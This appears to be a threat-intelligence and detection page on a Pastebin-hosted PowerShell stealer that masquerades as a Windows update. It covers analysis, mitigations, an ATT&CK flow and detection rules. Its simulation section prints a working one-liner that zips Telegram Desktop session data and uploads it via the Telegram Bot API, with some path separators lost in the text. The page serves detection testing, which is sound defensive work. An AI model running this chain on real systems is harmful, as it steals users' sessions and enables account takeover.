Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A malicious PowerShell script hosted on Pastebin poses as a Windows update while stealing Telegram Desktop session data from infected systems. The script gathers host details, compresses the Telegram tdata directory, and exfiltrates the resulting archive through the Telegram Bot API. Researchers also identified a related web-based stealer designed to capture Telegram Web authentication keys and forward them to a local HTTP collector. Both tools rely on the same Telegram bot for notifications, though the available evidence suggests they remain in a testing stage rather than broad operational use.
Investigation
Analysts recovered two Pastebin-hosted script variants, uncovered hard-coded bot tokens and chat IDs, and reconstructed the full exfiltration process. During execution, the script terminates Telegram.exe, archives the tdata folder, and uploads the ZIP file through the bot’s sendDocument API method. Bot telemetry also exposed a separate web-focused stealer that transmitted MTProto authentication keys to a private collector hosted at 192.168.137.131:5000. Overall, the findings point to functional testing and validation rather than a mature, large-scale campaign.
Mitigation
Organizations that do not require Telegram should block outbound traffic to api.telegram.org and related Telegram infrastructure. Defenders should monitor PowerShell for use of Invoke-RestMethod or WebClient targeting Telegram API endpoints and detect ZIP archives created in temporary directories that contain tdata content. Any exposed bot tokens should be revoked immediately and replaced to prevent further misuse.
Response
If the script is discovered, terminate the associated PowerShell process and remove any generated diag.zip archives. Revoke all active Telegram sessions tied to the affected account and enable two-factor authentication to reduce the risk of continued access. The bot token should be changed, and the linked bot chat should be reviewed for evidence of exfiltrated data. A broader forensic investigation should also confirm whether any additional credentials or session material were collected.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 %% Action nodes action_user_exec["<b>Action</b> – <b>T1204 User Execution</b><br/>Victim runs PowerShell script named Windows Telemetry Update<br/><b>Technique</b> T1036 Masquerading"] class action_user_exec action action_powershell_interp["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Script executed via PowerShell interpreter"] class action_powershell_interp action action_sysinfo["<b>Action</b> – <b>T1082 System Information Discovery</b><br/>Collects USERNAME, COMPUTERNAME and public IP"] class action_sysinfo action action_collect_tdata["<b>Action</b> – <b>T1005 Data from Local System</b><br/>Locates Telegram Desktop tdata directories and terminates Telegram.exe"] class action_collect_tdata action action_archive["<b>Action</b> – <b>T1560.001 Archive via Utility</b><br/>Compressu2011Archive creates diag.zip with collected files"] class action_archive action action_delete["<b>Action</b> – <b>T1070.004 File Deletion</b><br/>Deletes diag.zip after upload"] class action_delete action action_exfiltration["<b>Action</b> – <b>T1020 Automated Exfiltration</b><br/>Uses Telegram Bot sendDocument endpoint to exfiltrate zip file<br/><b>Subu2011techniques</b> T1041 Exfiltration Over C2 Channel, T1567 Exfiltration Over Web Service, T1071.001 Web Protocols"] class action_exfiltration action action_session_hijack["<b>Action</b> – <b>T1563 Remote Service Session Hijacking</b><br/>Replays MTProto authorization keys from harvested tdata"] class action_session_hijack action action_steal_cookies["<b>Action</b> – <b>T1550.004 Use Alternate Authentication Material</b><br/>Steals Telegram Web session cookies from browser storage and forwards to collector"] class action_steal_cookies action %% Tool / Process nodes tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Windows commandu2011line shell and scripting language"] class tool_powershell tool tool_compress["<b>Tool</b> – <b>Name</b>: Compressu2011Archive<br/><b>Description</b>: PowerShell cmdlet to create ZIP archives"] class tool_compress tool process_telegram["<b>Process</b> – <b>Name</b>: Telegram.exe<br/><b>Description</b>: Desktop client for Telegram messaging"] class process_telegram process tool_telegram_bot["<b>Tool</b> – <b>Name</b>: Telegram Bot API<br/><b>Description</b>: sendDocument endpoint used for data exfiltration"] class tool_telegram_bot tool %% Connections showing flow action_user_exec –>|triggers| action_powershell_interp action_powershell_interp –>|uses| tool_powershell action_powershell_interp –>|executes| action_sysinfo action_sysinfo –>|collects| action_collect_tdata action_collect_tdata –>|terminates| process_telegram action_collect_tdata –>|uses| tool_compress action_collect_tdata –>|creates| action_archive action_archive –>|uses| tool_compress action_archive –>|produces| action_exfiltration action_exfiltration –>|uses| tool_telegram_bot action_exfiltration –>|deletes| action_delete action_delete –>|cleans up| action_exfiltration action_exfiltration –>|enables| action_session_hijack action_session_hijack –>|facilitates| action_steal_cookies "
Attack Flow
Detections
Call Suspicious .NET Methods from Powershell (via powershell)
View
Possible Telegram Abuse As Command And Control Channel (via dns_query)
View
Possible IP Lookup Domain Communications Attempted (via dns)
View
IOCs (SourceIP) to detect: Inside A Telegram Session Stealer: How A Pastebin-Hosted PowerShell Script Targets Desktop And Web Sessions
View
IOCs (DestinationIP) to detect: Inside A Telegram Session Stealer: How A Pastebin-Hosted PowerShell Script Targets Desktop And Web Sessions
View
Detection of Telegram Session Stealer via PowerShell Script [Windows Network Connection]
View
Windows Telemetry Update – Telegram Session Stealer [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Reconnaissance: The attacker queries
api.ipify.orgto discover the host’s public IP (used later for logging). - Service Disruption: Stops the legitimate Telegram Desktop process to ensure files are not locked.
- Data Collection: Recursively copies the Telegram Desktop
tdatadirectory (session files) to a temporary location. - Archiving: Compresses the harvested data into
diag.zip. - Exfiltration: Sends the archive to a malicious Telegram Bot via
Invoke‑RestMethod. - Cleanup: Deletes the temporary archive and optionally restarts Telegram.
- Reconnaissance: The attacker queries
-
Regression Test Script: Executes the full attack chain in a single PowerShell command line (matching the detection rule).
# Windows Telemetry Update – Telegram Session Stealer $ip = (Invoke-RestMethod -Uri "http://api.ipify.org").Content; Stop-Process -Name Telegram -Force; $src = "$env:APPDATATelegram Desktoptdata"; $dst = "$env:TEMPdiag"; Copy-Item -Path $src -Destination $dst -Recurse -Force; Compress-Archive -Path $dst* -DestinationPath "$env:TEMPdiag.zip" -Force; $botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"; $chatId = "987654321"; Invoke-RestMethod -Uri "https://api.telegram.org/bot$botToken/sendDocument?chat_id=$chatId" -Method Post -InFile "$env:TEMPdiag.zip" -ContentType "multipart/form-data"; Remove-Item -Path "$env:TEMPdiag.zip" -Force; -
Cleanup Commands: Restores the environment to its original state.
# Restart Telegram (if desired) and remove copied data Start-Process -FilePath "$env:ProgramFilesTelegram DesktopTelegram.exe" -WindowStyle Hidden; Remove-Item -Path "$env:TEMPdiag" -Recurse -Force;